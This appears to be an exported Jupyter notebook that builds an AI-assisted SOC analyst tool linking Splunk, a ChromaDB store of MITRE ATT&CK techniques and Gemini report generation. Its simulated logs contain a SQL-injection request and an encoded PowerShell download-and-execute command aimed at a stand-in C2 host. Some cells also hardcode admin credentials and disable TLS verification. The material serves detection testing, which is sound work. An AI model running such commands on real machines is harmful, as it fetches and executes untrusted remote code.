            relevant_knowledge_str += f"* **Source:** {general_knowledge_results['metadatas'][0][i].get('type', 'N/A')} ({general_knowledge_results['metadatas'][0][i].get('incident_type', '')})\n"
            relevant_knowledge_str += f"    **Content:** {doc}\n\n"
    else:
        print("No specific relevant general knowledge found in vector store.")
    print("Searching vector store for potential MITRE ATT&CK mappings...")
    mitre_mapping_query = f"Analyze the following security events and identify potential MITRE ATT&CK tactics and techniques: {formatted_splunk_logs}"
    mitre_mapping_results = search_security_knowledge_base(
        mitre_mapping_query,
        n_results=10,
        filter_metadata={"type": "mitre_attack_technique"}
    )
    identified_mitre_mappings = []
    if mitre_mapping_results and mitre_mapping_results['documents']:
        print("Found potential MITRE ATT&CK mappings:")
        for i, doc_content in enumerate(mitre_mapping_results['documents'][0]):
            metadata = mitre_mapping_results['metadatas'][0][i]
            distance = mitre_mapping_results['distances'][0][i]
            if distance < distance_threshold:
                identified_mitre_mappings.append({
                    "technique_name": metadata.get('technique_name'),
                    "technique_id": metadata.get('technique_id'),
                    "tactics": metadata.get('tactics'),
                    "description": doc_content,
                    "distance_score": distance
                })
        identified_mitre_mappings.sort(key=lambda x: x['distance_score'])
        identified_mitre_mappings = identified_mitre_mappings[:5]
        for mapping in identified_mitre_mappings:
            print(f"  - {mapping['technique_id']}: {mapping['technique_name']} (Score: {mapping['distance_score']:.2f})")
    else:
        print("No relevant MITRE ATT&CK techniques found within the threshold.")
    print("Generating incident report with Gemini...")
    incident_report = generate_incident_report(
        formatted_splunk_logs,
        relevant_knowledge_str,
        identified_mitre_mappings,
        incident_summary
    )
    print("\n--- AI SOC Analyst Assistant Completed ---")
    return incident_report

# --- Main Execution Block ---
if __name__ == "__main__":
    print("--- Checking/Populating Security Knowledge Base with MITRE ATT&CK ---")
    total_docs_in_db = security_collection.count()
    needs_mitre_population = False
    
    if total_docs_in_db == 0:
        needs_mitre_population = True
        print("ChromaDB collection is currently empty. MITRE ATT&CK data needs to be populated.")
    else:
        try:
            mitre_techniques_in_db = security_collection.get(where={"type": "mitre_attack_technique"}, include=[])
            if len(mitre_techniques_in_db['ids']) == 0:
                needs_mitre_population = True
                print("Other documents found, but MITRE ATT&CK data is not present in knowledge base. Populating now...")
            else:
                print(f"MITRE ATT&CK data already present in knowledge base ({len(mitre_techniques_in_db['ids'])} techniques found). Skipping initial population.")
        except Exception as e:
            print(f"Warning: Error checking for existing MITRE data with .get(): {e}")
            print("Assuming MITRE data needs population to be safe.")
            needs_mitre_population = True

    if needs_mitre_population:
        mitre_data_points = load_mitre_attack_data(stix_json_path="enterprise-attack.json")
        if mitre_data_points:
            populate_security_knowledge_base(mitre_data_points)
        else:
            print("MITRE ATT&CK data not loaded from file. Mapping might be less effective.")
    
    sample_data_present = False
    try:
        if security_collection.get(ids=["playbook_phishing_response"], include=[])['ids']:
            sample_data_present = True
    except Exception as e:
        print(f"Warning: Error checking for sample data: {e}. Will attempt to add.")
        sample_data_present = False

    if not sample_data_present:
        print("Sample security knowledge not fully present. Populating now...")
        sample_security_knowledge = [
            {"id": "playbook_phishing_response", "text": "Playbook: Phishing Incident Response. Trigger: User reports suspicious email or email gateway alert. Steps: 1. Verify email authenticity (headers, sender reputation). 2. Check for malicious attachments/links (sandbox). 3. If malicious, remove email from all affected inboxes. 4. Reset user password if credentials compromised. 5. Educate user. 6. Block malicious sender/domains at firewall/proxy. 7. Log and document. Severity: Medium to High depending on compromise.", "metadata": {"type": "playbook", "incident_type": "phishing"}},
            {"id": "playbook_malware_containment", "text": "Playbook: Malware Containment and Eradication. Trigger: EDR alert, antivirus detection, or user report of suspicious activity. Steps: 1. Isolate infected host(s) from network immediately. 2. Collect forensic data (memory dump, process list). 3. Run full endpoint scan. 4. Identify persistence mechanisms (registry, scheduled tasks, services). 5. Remove malware and persistence. 6. Restore affected files from clean backup. 7. Update security definitions. Severity: High.", "metadata": {"type": "playbook", "incident_type": "malware"}},
            {"id": "inc_003_unauth_db_access", "text": "Past Incident: Incident ID INC-2024-003. Type: Unauthorized Access - Database. Date: 2024-05-10. Affected: Customer Database (MySQL). Attack Vector: Brute force via SSH followed by database privilege escalation. Description: Numerous failed SSH logins from external IP, then successful login to 'admin' account, followed by `SELECT * FROM users;` queries. Containment: Blocked source IP at firewall, disabled compromised admin account, rotated DB credentials. Impact: Potential exfiltration of customer PII. Lessons Learned: Implement MFA for all admin accounts, stronger password policies. MITRE ATT&CK T1078 (Valid Accounts), T1110 (Brute Force).", "metadata": {"type": "past_incident", "incident_type": "unauthorized_access", "mitre_id": "T1078, T1110"}},
        ]
        populate_security_knowledge_base(sample_security_knowledge)
    else:
        print("Sample security knowledge appears to be present. Skipping population.")

    print(f"\nTotal unique documents in knowledge base: {security_collection.count()}")

    # --- Run scenarios with corrected simulated data generation ---
    # IMPORTANT: The string must start with """| makeresults and end with """ (no newline after last """)
    splunk_simulated_logs = """| makeresults count=6
| streamstats count as rn
| eval _time = case(
    rn=1, relative_time(now(), "-30s"),
    rn=2, relative_time(now(), "-25s"),
    rn=3, relative_time(now(), "-20s"),
    rn=4, relative_time(now(), "-15s"),
    rn=5, relative_time(now(), "-10s"),
    rn=6, relative_time(now(), "-5s")
  )
| eval host = case(
    rn <= 5, "webserver-01",
    rn=6, "endpoint-05"
  )
| eval source = case(
    rn <= 4, "/var/log/auth.log",
    rn=5, "/var/log/apache2/access.log",
    rn=6, "PowerShell Operational Log"
  )
| eval _raw = case(
    rn=1, "May 24 09:30:00 webserver-01 sshd[12345]: Failed password for invalid user root from 192.168.1.10 port 54321 ssh2",
    rn=2, "May 24 09:30:05 webserver-01 sshd[12345]: Failed password for invalid user root from 192.168.1.10 port 54321 ssh2",
    rn=3, "May 24 09:30:10 webserver-01 sshd[12345]: Failed password for user admin from 192.168.1.10 port 54322 ssh2",
    rn=4, "May 24 09:30:15 webserver-01 sshd[12345]: Accepted password for user admin from 192.168.1.10 port 54322 ssh2",
    rn=5, "192.168.1.10 - - [24/May/2025:09:30:20 +0000] \"GET /admin.php?id=1' UNION SELECT 1,2,3-- HTTP/1.1\" 404 200 \"-\" \"Mozilla/5.0\"",
    rn=6, "powershell.exe -NoP -NonI -Exec Bypass -EncodedCommand SQBFAFgAKAAoAE4AZwBvAE0ALgBJAEUAdwAgACgAIgBoAHQAdABwAHMAOgAvAC8AYwAyAC4AZgBhAGsAZQBkAG8AbwBtAGEAaW4ALwBwAGEAYQB5AGwAbwBhAGQALgBwAHMAMAAiACkAKQAKAA=="
  )
| table _time, host, source, _raw
| sort _time""" # Ensure this line is exactly as shown, with """ immediately after _time

    print("\n\n=== Running Combined Simulated Scenario (with MITRE Mapping) ===")
    report_combined = ai_soc_analyst_assistant(splunk_simulated_logs, incident_summary="Simulated multiple failed SSH login attempts, a successful login, an attempted SQL Injection, and an encoded PowerShell command on an endpoint.")
    print(report_combined)

--- Checking/Populating Security Knowledge Base with MITRE ATT&CK ---
MITRE ATT&CK data already present in knowledge base (823 techniques found). Skipping initial population.
Sample security knowledge appears to be present. Skipping population.

Total unique documents in knowledge base: 826


=== Running Combined Simulated Scenario (with MITRE Mapping) ===
--- Starting AI SOC Analyst Assistant for query: | makeresults count=6
| streamstats count as rn
| eval _time = case(
    rn=1, relative_time(now(), "-30s"),
    rn=2, relative_time(now(), "-25s"),
    rn=3, relative_time(now(), "-20s"),
    rn=4, relative_time(now(), "-15s"),
    rn=5, relative_time(now(), "-10s"),
    rn=6, relative_time(now(), "-5s")
  )
| eval host = case(
    rn <= 5, "webserver-01",
    rn=6, "endpoint-05"
  )
| eval source = case(
    rn <= 4, "/var/log/auth.log",
    rn=5, "/var/log/apache2/access.log",
    rn=6, "PowerShell Operational Log"
  )
| eval _raw = case(
    rn=1, "May 24 09:30:00 webserver-01 sshd

In [15]:
import splunklib.client as client

# ... (your existing SPLUNK_HOST, SPLUNK_PORT, SPLUNK_USERNAME, SPLUNK_PASSWORD)
SPLUNK_HOST = os.environ.get("SPLUNK_HOST", "localhost")
SPLUNK_PORT = os.environ.get("SPLUNK_PORT", 8000)
SPLUNK_USERNAME = os.environ.get("SPLUNK_USERNAME", "admin")
SPLUNK_PASSWORD = os.environ.get("SPLUNK_PASSWORD", "changeme")
GEMINI_API_KEY = os.environ.get("GEMINI_API_KEY")
SPLUNK_TOKEN = os.environ.get("SPLUNK_TOKEN")

def connect_and_get_token():
    print('trying to connect')
    try:
        service = client.Service(
            host=SPLUNK_HOST,
            port=SPLUNK_PORT,
            session_token=SPLUNK_TOKEN

        )
        session_token = service.token # The token is accessible via service.token
        print("Successfully connected to Splunk and obtained session token.")
        print(f"Session Token: {session_token}")
        return service, session_token
    except Exception as e:
        print(f"Error connecting to Splunk: {e}")
        return None, None
connect_and_get_token()

trying to connect
Successfully connected to Splunk and obtained session token.
Session Token: <class 'splunklib.binding._NoAuthenticationToken'>


(<splunklib.client.Service at 0x1fb87e5c310>,
 splunklib.binding._NoAuthenticationToken)

In [22]:
import os
import splunklib.client as client
import splunklib.results as results

# --- Configuration ---
# Set these environment variables, or hardcode them for quick testing (NOT recommended for production)
# Example:
# export SPLUNK_HOST="127.0.0.1"
# export SPLUNK_PORT="8089"
# export SPLUNK_USERNAME="admin"
# export SPLUNK_PASSWORD="changeme"

SPLUNK_HOST = os.environ.get("SPLUNK_HOST", "127.0.0.1")
SPLUNK_PORT = int(os.environ.get("SPLUNK_PORT", 8000))
SPLUNK_USERNAME = os.environ.get("SPLUNK_USERNAME", "admin")
SPLUNK_PASSWORD = os.environ.get("SPLUNK_PASSWORD", "changeme")
SPLUNK_TOKEN = os.environ.get("SPLUNK_TOKEN",)
# --- Splunk Connection Function ---
def connect_to_splunk():
    """Connects to Splunk and returns a Service object."""
    print(f"Attempting to connect to Splunk at {SPLUNK_HOST}:{8089}...")
    try:
        service = client.connect(
            host="127.0.0.1",
            port="8089",
            username="admin",
            password="admin123",
            scheme="https", # Use http for the management port 8089 if not configured for https
        )
        print("Successfully connected to Splunk.")
        return service
    except Exception as e:
        print(f"Error connecting to Splunk: {e}")
        return None

# --- Splunk Query Execution Function ---
# --- Splunk Query Execution Function ---
# --- Splunk Query Execution Function ---
def run_splunk_query(service, query, earliest_time="-1h", latest_time="now", output_mode="json"):
    """
    Runs a Splunk search query and returns the results.
    """
    print(f"Attempting to run Splunk query:\n```\n{query}\n```")
    try:
        # Add 'app' parameter to ensure the search runs in the 'search' app context
        kwargs = {
            "earliest_time": earliest_time,
            "latest_time": latest_time,
            "output_mode": output_mode,
            "app": "search"  # <--- ADD THIS LINE
        }
        job = service.jobs.create(query, **kwargs)

        # Wait for the job to complete
        while not job.is_ready():
            pass # Or add a short sleep: time.sleep(0.1)

        if job.is_done():
            reader = results.ResultsReader(job.results())
            events = []
            for item in reader:
                events.append(item)
            job.cancel() # Clean up the search job
            print(f"Successfully retrieved {len(events)} events from Splunk.")
            return events
        else:
            # If job failed and messages are empty, try to get diagnostic info
            print(f"Splunk search job failed. Messages: {job.messages}")
            # Consider adding job.status() or job.content for more details here if it keeps failing
            job.cancel()
            return []
    except Exception as e:
        print(f"Error running Splunk query: {e}")
        return []

# ... (rest of the script remains the same) ...
# ... (rest of the script remains the same) ...

# --- Main Execution Block ---
if __name__ == "__main__":
    print("--- Starting Splunk Dummy Data Test ---")

    # 1. Connect to Splunk
    splunk_service = connect_to_splunk()
    if not splunk_service:
        print("Failed to establish connection to Splunk. Exiting.")
        exit(1) # Exit if connection fails

    # 2. Define a very simple dummy data query
    # This query uses 'makeresults' to generate 3 dummy events.
    # It starts immediately with '|' after the triple quotes to avoid syntax errors.
    dummy_query = """| makeresults count=3
| eval _time=strftime(now(), "%Y-%m-%d %H:%M:%S")
| streamstats count as event_id
| eval message=case(event_id=1, "This is dummy event 1",
                     event_id=2, "This is dummy event 2",
                     event_id=3, "This is dummy event 3")
| eval host=case(event_id=1, "test-host-01",
                  event_id=2, "test-host-01",
                  event_id=3, "test-host-02")
| table _time, host, event_id, message"""

    # 3. Run the dummy query
    dummy_events = run_splunk_query(splunk_service, dummy_query)

    # 4. Print retrieved dummy data
    if dummy_events:
        print("\n--- Retrieved Dummy Data ---")
        for event in dummy_events:
            print(event) # Each 'event' is a dictionary-like object

    # 5. Log out from Splunk (good practice)
    try:
        splunk_service.logout()
        print("\nLogged out from Splunk.")
    except Exception as e:
        print(f"Error during Splunk logout: {e}")

    print("--- Splunk Dummy Data Test Completed ---")

--- Starting Splunk Dummy Data Test ---
Attempting to connect to Splunk at 127.0.0.1:8089...
Successfully connected to Splunk.
Attempting to run Splunk query:
```
| makeresults count=3
| eval _time=strftime(now(), "%Y-%m-%d %H:%M:%S")
| streamstats count as event_id
| eval message=case(event_id=1, "This is dummy event 1",
                     event_id=2, "This is dummy event 2",
                     event_id=3, "This is dummy event 3")
| eval host=case(event_id=1, "test-host-01",
                  event_id=2, "test-host-01",
                  event_id=3, "test-host-02")
| table _time, host, event_id, message
```
Successfully retrieved 3 events from Splunk.

--- Retrieved Dummy Data ---
OrderedDict([('_time', '2025-05-24 23:08:25'), ('host', 'test-host-01'), ('event_id', '1'), ('message', 'This is dummy event 1')])
OrderedDict([('_time', '2025-05-24 23:08:25'), ('host', 'test-host-01'), ('event_id', '2'), ('message', 'This is dummy event 2')])
OrderedDict([('_time', '2025-05-24 23:08:25

  reader = results.ResultsReader(job.results())


In [10]:
import os
import json
import datetime
import math
import random
import time
import re
import uuid

# Core Libraries
import chromadb
import splunklib.client as client
import splunklib.results as results

# For MITRE ATT&CK data parsing
from stix.core import STIXPackage
#from stix.utils.idgen import set_id_namespace
from stixmarx import ATTACK_V12

# For LLM and Embeddings (using Google Gemini)
import google.generativeai as genai

# --- Configuration ---
# Splunk Settings (ensure these match your working Splunk setup)
SPLUNK_HOST = os.environ.get("SPLUNK_HOST", "127.0.0.1")
SPLUNK_PORT = int(os.environ.get("SPLUNK_PORT", 8089))
SPLUNK_USERNAME = os.environ.get("SPLUNK_USERNAME", "admin")
SPLUNK_PASSWORD = os.environ.get("SPLUNK_PASSWORD", "changeme") # IMPORTANT: Replace with your actual password

# Google Gemini API Key
GEMINI_API_KEY = os.environ.get("GEMINI_API_KEY")
if not GEMINI_API_KEY:
    raise ValueError("GEMINI_API_KEY environment variable not set. Get your key from Google AI Studio.")

# ChromaDB Settings
CHROMA_DB_PATH = "./chroma_db"
COLLECTION_NAME = "security_knowledge_base"

# MITRE ATT&CK Data File
MITRE_STIX_JSON_PATH = "enterprise-attack.json" # Ensure this file is in the same directory

# Initialize Google Gemini
genai.configure(api_key=GEMINI_API_KEY)
# For text generation (using gemini-pro)
llm = genai.GenerativeModel('gemini-pro')
# For embeddings (using embedding-001)
embedding_model = 'embedding-001'

# ChromaDB Client & Collection Setup
client_db = chromadb.PersistentClient(path=CHROMA_DB_PATH)
security_collection = client_db.get_or_create_collection(name=COLLECTION_NAME)

# --- Helper Functions for ChromaDB and MITRE ATT&CK ---

def load_mitre_attack_data(stix_json_path):
    """Loads MITRE ATT&CK techniques from a STIX JSON file."""
    print(f"Loading MITRE ATT&CK data from {stix_json_path}...")
    try:
        with open(stix_json_path, 'r', encoding='utf-8') as f:
            stix_package_dict = json.load(f)

        #set_id_namespace(ATTACK_V12) # Set the namespace for correct ID parsing
        stix_package = STIXPackage.from_dict(stix_package_dict)
        stix_store = stix_package.to_id_mapping()

        attack_data_points = []
        for tech in stix_store.get_all(filter=lambda obj: obj.type == 'attack-pattern'):
            mitre_id = tech.external_references[0].external_id if tech.external_references else 'N/A'
            
            # Construct description with mitigations and examples if available
            description = tech.description.value if tech.description else ''
            
            # Extract mitigations
            mitigation_text = []
            for relationship in stix_store.query(
                client.Filter("target_ref", "=", tech.id),
                client.Filter("relationship_type", "=", "mitigates")
            ):
                mitigation_obj = stix_store.query(client.Filter("id", "=", relationship.source_ref))
                if mitigation_obj and mitigation_obj[0].type == 'course-of-action':
                    mitigation_text.append(f"Mitigation: {mitigation_obj[0].description.value}")

            # Extract examples
            example_text = []
            for relationship in stix_store.query(
                client.Filter("source_ref", "=", tech.id),
                client.Filter("relationship_type", "=", "uses")
            ):
                if hasattr(relationship, 'description') and relationship.description:
                    example_text.append(f"Example: {relationship.description.value}")

            full_text = f"ATT&CK Technique ID: {mitre_id}\nName: {tech.name}\nDescription: {description}"
            if mitigation_text:
                full_text += "\n" + "\n".join(mitigation_text)
            if example_text:
                full_text += "\n" + "\n".join(example_text)

            # Extract tactics
            tactics_names = []
            for relationship in stix_store.query(client.Filter("source_ref", "=", tech.id), client.Filter("relationship_type", "=", "uses")):
                tactic_obj = stix_store.query(client.Filter("id", "=", relationship.target_ref))
                if tactic_obj and tactic_obj[0].type == 'tactic':
                    tactics_names.append(tactic_obj[0].name)
            
            # Fix for ValueError: Ensure tactics for metadata is always a string
            tactics_for_metadata = ', '.join(tactics_names) if tactics_names else 'N/A'

            attack_data_points.append({
                "id": mitre_id,
                "text": full_text,
                "metadata": {
                    "type": "mitre_attack_technique",
                    "technique_id": mitre_id,
                    "technique_name": tech.name,
                    "tactics": tactics_for_metadata, # Use the guaranteed string variable
                    "is_subtechnique": tech.x_mitre_is_subtechnique if hasattr(tech, 'x_mitre_is_subtechnique') else False,
                    "source_file": stix_json_path
                }
            })
        print(f"Loaded {len(attack_data_points)} MITRE ATT&CK techniques.")
        return attack_data_points
    except FileNotFoundError:
        print(f"Error: MITRE ATT&CK STIX JSON file not found at '{stix_json_path}'.")
        return []
    except Exception as e:
        print(f"Error loading MITRE ATT&CK data: {e}")
        return []


def populate_security_knowledge_base(data_points):
    """Populates the ChromaDB collection with security knowledge data points."""
    print(f"Populating security knowledge base with {len(data_points)} documents...")
    docs_to_add = []
    embeddings_to_add = []
    metadatas_to_add = []
    ids_to_add = []

    for dp in data_points:
        try:
            # Generate embeddings for the document text
            response = genai.embed_content(model=embedding_model, content=dp["text"])
            embedding = response['embedding']
            
            docs_to_add.append(dp["text"])
            embeddings_to_add.append(embedding)
            metadatas_to_add.append(dp["metadata"])
            ids_to_add.append(dp["id"])
        except Exception as e:
            print(f"Failed to generate embedding for: {dp['text'][:50]}... Error: {e}")

    if docs_to_add:
        security_collection.add(
            documents=docs_to_add,
            embeddings=embeddings_to_add,
            metadatas=metadatas_to_add,
            ids=ids_to_add
        )
        print(f"Populated vector store with {len(docs_to_add)} new security knowledge documents.")
    else:
        print("No documents to add to the vector store.")


def get_related_security_knowledge(query_text, num_results=3):
    """Retrieves relevant security knowledge from the vector store."""
    try:
        query_embedding_response = genai.embed_content(model=embedding_model, content=query_text)
        query_embedding = query_embedding_response['embedding']
        
        results = security_collection.query(
            query_embeddings=[query_embedding],
            n_results=num_results,
            include=['documents', 'metadatas', 'distances']
        )
        
        related_knowledge = []
        if results and results['documents']:
            for i in range(len(results['documents'][0])):
                doc = results['documents'][0][i]
                meta = results['metadatas'][0][i]
                distance = results['distances'][0][i]
                related_knowledge.append({
                    "document": doc,
                    "metadata": meta,
                    "distance": distance
                })
        return related_knowledge
    except Exception as e:
        print(f"Error retrieving security knowledge: {e}")
        return []


# --- Splunk Connection & Query Functions ---

def connect_to_splunk():
    """Connects to Splunk and returns a Service object."""
    connection_url = f"https://{SPLUNK_HOST}:{SPLUNK_PORT}"
    print(f"Attempting to connect to Splunk at {connection_url}...")
    try:
        service = client.connect(
            host=SPLUNK_HOST,
            port=SPLUNK_PORT,
            username=SPLUNK_USERNAME,
            password=SPLUNK_PASSWORD,
            scheme="https",
            verify=False # IMPORTANT: Use verify=True with proper CA in production
        )
        print("Successfully connected to Splunk.")
        return service
    except Exception as e:
        print(f"Error connecting to Splunk: {e}")
        return None

def run_splunk_query(service, query, earliest_time="-1h", latest_time="now", output_mode="json"):
    """
    Runs a Splunk search query and returns the results.
    """
    print(f"Attempting to run Splunk query:\n```\n{query}\n```")
    try:
        kwargs = {
            "earliest_time": earliest_time,
            "latest_time": latest_time,
            "output_mode": output_mode,
            "app": "search" # Run search in the 'search' app context
        }
        job = service.jobs.create(query, **kwargs)

        # Wait for the job to complete
        while not job.is_ready():
            time.sleep(0.1) # Small sleep to avoid busy-waiting

        if job.is_done():
            reader = results.ResultsReader(job.results())
            events = []
            for item in reader:
                events.append(item)
            job.cancel() # Clean up the search job
            print(f"Successfully retrieved {len(events)} events from Splunk.")
            return events
        else:
            print(f"Splunk search job failed. Messages: {job.messages}")
            job.cancel()
            return []
    except Exception as e:
        print(f"Error running Splunk query: {e}")
        return []

# --- AI SOC Analyst Assistant Core Function ---

def generate_security_report(raw_logs, security_knowledge_base_results):
    """
    Generates a security report based on raw logs and related security knowledge,
    including MITRE ATT&CK mapping.
    """
    print("\n--- Generating Security Report with AI ---")
    
    # Prepare logs for AI
    log_summary = "\n".join([f"Host: {log.get('host', 'N/A')}, Message: {log.get('message', str(log))}" for log in raw_logs])
    
    # Prepare security knowledge
    knowledge_summary = "\n\n".join([
        f"Technique ID: {res['metadata']['technique_id']}\n"
        f"Name: {res['metadata']['technique_name']}\n"
        f"Tactics: {res['metadata']['tactics']}\n"
        f"Description: {res['document']}\n"
        f"Similarity Score: {res['distance']:.4f}"
        for res in security_knowledge_base_results
    ])

    prompt = f"""
You are an expert SOC analyst powered by AI. Your task is to analyze security logs, identify potential threats, map them to MITRE ATT&CK techniques, and provide actionable insights.

**Security Logs:**
{log_summary}

**Related MITRE ATT&CK Knowledge:**
(This knowledge is retrieved from a security knowledge base based on similarity to the logs. Use this information to map, explain findings, and suggest mitigations. Prioritize techniques with lower similarity scores as they are more relevant.)
{knowledge_summary}
**Your Report Should Include the Following Sections:**

1.  **Summary of Findings:** Briefly describe the key events and potential incidents observed in the logs.
2.  **Identified MITRE ATT&CK Techniques:** For each potential threat or suspicious activity, list the relevant MITRE ATT&CK Technique ID(s) and Name(s) from the 'Related MITRE ATT&CK Knowledge'. Explain *why* you believe these specific techniques apply to the observed logs.
3.  **Severity Assessment:** Assign an overall severity rating (e.g., Low, Medium, High, Critical) to the findings and provide a clear justification.
4.  **Recommended Actions:** Provide clear, actionable steps for a human analyst or automated system to take to address the identified threats. Incorporate relevant mitigations from the MITRE knowledge.
5.  **Further Investigation:** Suggest additional areas or data sources that should be examined to gain a more complete understanding of the incident.

**Please format your response clearly with headings for each section.**
"""
    
    try:
        # Generate content using the LLM
        response = llm.generate_content(prompt)
        report_text = response.text
        print("\n--- AI-Generated Security Report ---")
        print(report_text)
        return report_text
    except Exception as e:
        print(f"Error generating AI report: {e}")
        return "Failed to generate report."

# --- Main Execution Block ---
if __name__ == "__main__":
    print("--- Starting AI SOC Analyst Assistant (Full Architecture) ---")

    # 0. Check/Populate Security Knowledge Base (ChromaDB)
    # This step ensures the vector database has the MITRE ATT&CK data.
    # It checks the collection count to avoid re-populating if already done.
    print("\n--- Checking/Populating Security Knowledge Base with MITRE ATT&CK ---")
    # A heuristic: if collection has significantly fewer than total MITRE techniques (approx 800+), populate it.
    if security_collection.count() < 800:
        print("ChromaDB collection is currently empty or incomplete. MITRE ATT&CK data needs to be populated.")
        mitre_data_points = load_mitre_attack_data(stix_json_path=MITRE_STIX_JSON_PATH)
        if mitre_data_points:
            populate_security_knowledge_base(mitre_data_points)
        else:
            print("MITRE ATT&CK data not loaded from file. AI mapping might be less effective.")
    else:
        print(f"MITRE ATT&CK data already present in knowledge base ({security_collection.count()} techniques found). Skipping initial population.")
    
    print(f"Total unique documents in knowledge base: {security_collection.count()}")


    print("\n=== Running Combined Simulated Scenario (with MITRE Mapping) ===")

    # 1. Connect to Splunk
    splunk_service = connect_to_splunk()
    if not splunk_service:
        print("Failed to connect to Splunk. Cannot proceed.")
        exit(1) # Exit the script if Splunk connection fails

    # 2. Define a more complex simulated Splunk query for security logs
    # This query uses 'makeresults' to generate mock security events that hint at malicious activity.
    splunk_simulated_logs_query = """
| makeresults count=6
| streamstats count as rn
| eval _time = case(
    rn=1, relative_time(now(), "-30s"),
    rn=2, relative_time(now(), "-25s"),
    rn=3, relative_time(now(), "-20s"),
    rn=4, relative_time(now(), "-15s"),
    rn=5, relative_time(now(), "-10s"),
    rn=6, relative_time(now(), "-5s")
  )
| eval host = case(
    rn <= 5, "webserver-01",
    rn=6, "endpoint-05"
  )
| eval source = case(
    rn <= 4, "/var/log/auth.log",
    rn=5, "/var/log/apache2/access.log",
    rn=6, "/var/log/syslog"
  )
| eval message = case(
    rn=1, "Failed password for root from 192.168.1.100 port 54321 ssh2",
    rn=2, "User 'jdoe' logged in successfully from 10.0.0.5 via SSH",
    rn=3, "sudo: jdoe : TTY=pts/0 ; PWD=/home/jdoe ; USER=root ; COMMAND=/bin/bash",
    rn=4, "Failed password for invalid user guest from 192.168.1.101 port 12345 ssh2",
    rn=5, "GET /admin/setup.php HTTP/1.1 200 - Mozilla/5.0",
    rn=6, "User 'admin' created a new scheduled task 'BackdoorScript' to run daily"
  )
| table _time, host, source, message
| sort _time
"""

    # 3. Run the simulated Splunk query to get security events
    security_events = run_splunk_query(splunk_service, splunk_simulated_logs_query)

    if not security_events:
        print("No security events retrieved from Splunk. Cannot proceed with analysis.")
        splunk_service.logout() # Ensure logout even if no events
        exit(1)

    print("\n--- Retrieved Security Events from Splunk ---")
    for event in security_events:
        # Print relevant fields from each event
        print(f"Time: {event.get('_time')}, Host: {event.get('host')}, Source: {event.get('source')}, Message: {event.get('message')}")

    # 4. Analyze logs and get related security knowledge from ChromaDB
    # Combine all messages into a single string for the embedding query
    combined_messages = " ".join([event.get('message', '') for event in security_events])
    
    print("\n--- Searching Security Knowledge Base for Related Techniques ---")
    # Retrieve the top 5 most relevant MITRE ATT&CK techniques
    related_knowledge = get_related_security_knowledge(combined_messages, num_results=5)

    if related_knowledge:
        print(f"Found {len(related_knowledge)} related security knowledge documents.")
        # Optional: Print a summary of found knowledge for quick review
        for item in related_knowledge:
            print(f"- Technique: {item['metadata']['technique_name']} ({item['metadata']['technique_id']}), Score: {item['distance']:.4f}")
    else:
        print("No related security knowledge found. AI mapping might be limited.")

    # 5. Generate AI Security Report using the retrieved logs and knowledge
    generate_security_report(security_events, related_knowledge)

    # 6. Log out from Splunk (good practice to close the session)
    try:
        splunk_service.logout()
        print("\nLogged out from Splunk.")
    except Exception as e:
        print(f"Error during Splunk logout: {e}")

    print("\n--- AI SOC Analyst Assistant (Full Architecture) Completed ---")

ImportError: cannot import name 'ATTACK_V12' from 'stixmarx' (C:\Users\mohamed elmadany\AppData\Roaming\Python\Python311\site-packages\stixmarx\__init__.py)

In [3]:
import os
import time # Added for time.sleep
import json # Added for JSON handling if needed, though not directly used in the current version of the STIX loading
from dotenv import load_dotenv

# Splunk SDK imports
import splunklib.client as client
import splunklib.results as results

# ChromaDB import
import chromadb

# Google Gemini imports
import google.generativeai as genai

# STIX2 imports for MITRE ATT&CK parsing
from stix2 import MemoryStore, Filter, AttackPattern, Relationship

# Load environment variables from app.env file
load_dotenv("app.env")

# --- Configuration ---
SPLUNK_HOST = os.environ.get("SPLUNK_HOST", "127.0.0.1")
SPLUNK_PORT = int(os.environ.get("SPLUNK_PORT", 8089))
SPLUNK_USERNAME = os.environ.get("SPLUNK_USERNAME", "admin")
SPLUNK_PASSWORD = os.environ.get("SPLUNK_PASSWORD", "changeme") # IMPORTANT: Update this in app.env
SPLUNK_TOKEN = os.environ.get("SPLUNK_TOKEN") # Optional, not used in current connect_to_splunk

GEMINI_API_KEY = os.environ.get("GEMINI_API_KEY")
if not GEMINI_API_KEY:
    raise ValueError("GEMINI_API_KEY environment variable not set. Get your key from Google AI Studio (https://makersuite.google.com/).")

# Configure Google Gemini
genai.configure(api_key=GEMINI_API_KEY)
llm = genai.GenerativeModel('gemini-2.0-flash') # For text generation
embedding_model = 'embedding-001' # For embeddings

# ChromaDB Settings
CHROMA_DB_PATH = "./chroma_db"
chroma_client = chromadb.PersistentClient(path=CHROMA_DB_PATH)
SECURITY_COLLECTION_NAME = "security_knowledge"
security_collection = chroma_client.get_or_create_collection(SECURITY_COLLECTION_NAME)

# MITRE ATT&CK Data File Path
MITRE_STIX_JSON_PATH = "enterprise-attack.json" # Ensure this file is in the same directory as this script

# --- Splunk Connection & Query Functions ---
def connect_to_splunk():
    """Connects to Splunk and returns a Service object."""
    connection_url = f"https://{SPLUNK_HOST}:{SPLUNK_PORT}"
    print(f"Attempting to connect to Splunk at {connection_url}...")
    try:
        service = client.connect(
            host=SPLUNK_HOST,
            port=SPLUNK_PORT,
            username=SPLUNK_USERNAME,
            password=SPLUNK_PASSWORD,
            scheme="https", # Changed from http - Crucial for 8089
            verify=False # IMPORTANT: For testing with self-signed certs. Use True with a proper CA bundle in production!
        )
        print("Successfully connected to Splunk.")
        return service
    except Exception as e:
        print(f"Error connecting to Splunk: {e}")
        return None

def run_splunk_query(service, query, earliest_time="-1h", latest_time="now", output_mode="json"):
    """
    Runs a Splunk search query and returns the results.
    """
    print(f"Attempting to run Splunk query:\n```\n{query}\n```")
    try:
        kwargs = {
            "earliest_time": earliest_time,
            "latest_time": latest_time,
            "output_mode": output_mode,
            "app": "search"
        }
        job = service.jobs.create(query, **kwargs)

        print(f"Splunk Job ID: {job.sid}")
        # Wait for the job to complete
        while not job.is_ready():
            time.sleep(0.1)
            # Print the current dispatch state of the job for more detailed debugging
            print(f"Job {job.sid} status: {job.content.get('dispatchState')}") 

        # After job is ready, check if it's done or if there are messages
        if job.is_done():
            print(f"Splunk search job {job.sid} is DONE. Final dispatch state: {job.content.get('dispatchState')}")
            if job.messages: # Check for messages even if done (warnings, etc.)
                print(f"Job {job.sid} messages: {job.messages}")

            reader = results.ResultsReader(job.results())
            events = []
            for item in reader:
                events.append(item)
            job.cancel() # Clean up the search job to free resources on Splunk
            print(f"Successfully retrieved {len(events)} events from Splunk for Job ID {job.sid}.")
            return events
        else: # This block handles cases where the job might not complete successfully
